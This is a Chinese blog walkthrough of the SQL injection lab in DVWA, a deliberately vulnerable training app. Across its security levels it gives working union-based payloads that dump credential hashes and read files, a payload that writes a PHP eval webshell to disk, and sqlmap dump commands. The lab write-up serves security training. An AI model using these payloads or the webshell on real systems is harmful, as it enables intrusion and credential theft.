【DVWA】SQL Injection（SQL 注入）通关教程

日期：2019-07-28 20:43:48
更新：
作者：Bay0net
介绍：

0x00、基本信息

关于 mysql 相关的注入，传送门。

0x01、Low Security Level

查看源码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

查看代码可知，服务器对传来的 user_id 没有任何过滤，直接按照流程手工注入即可。

手注流程

# 判断是否为注入
?id=1' or '1'='1
?id=1' or '1'='2

# 判断字段长度（2 正常，3 异常）
?id=1' order by 2 -- 
?id=1' order by 3 --

# 确定回显点
?id=1' union select 111,222 -- 

# 用户名和数据库名称
?id=1' union select user(),database() -- 
-- output：admin@localhost、dvwa

# 查看当前用户和 mysql 版本
?id=1' union select current_user(),version() -- 
-- output：First name: admin@%、 5.5.47-0ubuntu0.14.04.1

# 爆表名
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() -- 
-- output：guestbook,users

# 爆列名（两种办法，加引号或者十六进制编码）
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 -- 
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- 
-- output：user_id,first_name,last_name,user,password,avatar,last_login,failed_login

# 爆字段名
?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users  -- 
?id=1' union select null,concat_ws(char(32,58,32),user,password) from users -- 
?id=1' union select user,password from users -- 
-- output：admin/5f4dcc3b5aa765d61d8327deb882cf99

# 读文件
?id=1' union select 1,load_file('//tmp//key') -- 

# 写文件()
?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
?id=999' union select null,'hello' into outfile '/tmp/test02' --
?id=999'  union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --  
?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' --

0x02、Medium Security Level

查看源码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}

?>

使用了 mysqli_real_escape_string 函数对特殊字符进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。

转义的特殊字符如下

\x00
\n
\r
\
'
"
\x1a

PHP mysql_real_escape_string() 函数

手注流程

此处是数字型注入，所以和特殊符号过滤关系不大，使用 hackbar 进行 POST 即可。

# 判断注入点
id=1 and 1=1 &Submit=Submit
id=1 and 1=2 &Submit=Submit

# 爆数据
id=1 union select user,password from users&Submit=Submit

0x03、High Secuirty Level

查看源码

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

分析源码

此处加了个 limit 1 来限制输出，但是可以直接注释掉，解法与 Low Security Level 相同。

0x04、Impossible Secuity Level

采用了 PDO 技术，划清了代码与数据的界限，有效防御 SQL 注入，同时只有返回的查询结果数量为一时，才会成功输出，这样就有效预防了”脱裤”，Anti-CSRFtoken 机制的加入了进一步提高了安全性。

DVWA SQL Injection 通关教程 | AnCoLin's Blog|影风博客

0x05、sqlmap 一把梭

利用 sqlmap 工具进行注入

# 爆所有数据库
sqlmap -r 1.txt --dbs
-- output：dvwa、information_schema、mysql、performance_schema

# 爆表名
sqlmap -r 1.txt -D dvwa --tables
-- output：guestbook、users

# 爆字段名
sqlmap -r 1.txt -D dvwa -T users --columns
-- output：user、password、first_name、last_login、last_name……

# 爆字段内容
sqlmap -r 1.txt -D dvwa -T users -C user,password --dump
-- output：得到账号和 MD5 hash 后的密码

posted @ 2019-07-28 20:47 Bay0net 阅读(3228) 评论(1) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Bay0net

【DVWA】SQL Injection（SQL 注入）通关教程

0x00、基本信息

0x01、Low Security Level

查看源码

手注流程

0x02、Medium Security Level

查看源码

手注流程

0x03、High Secuirty Level

查看源码

分析源码

0x04、Impossible Secuity Level

0x05、sqlmap 一把梭

About Me

别活成自己讨厌的那种人就成。

有问题欢迎沟通交流 :)

WeChat：Bay0net

公告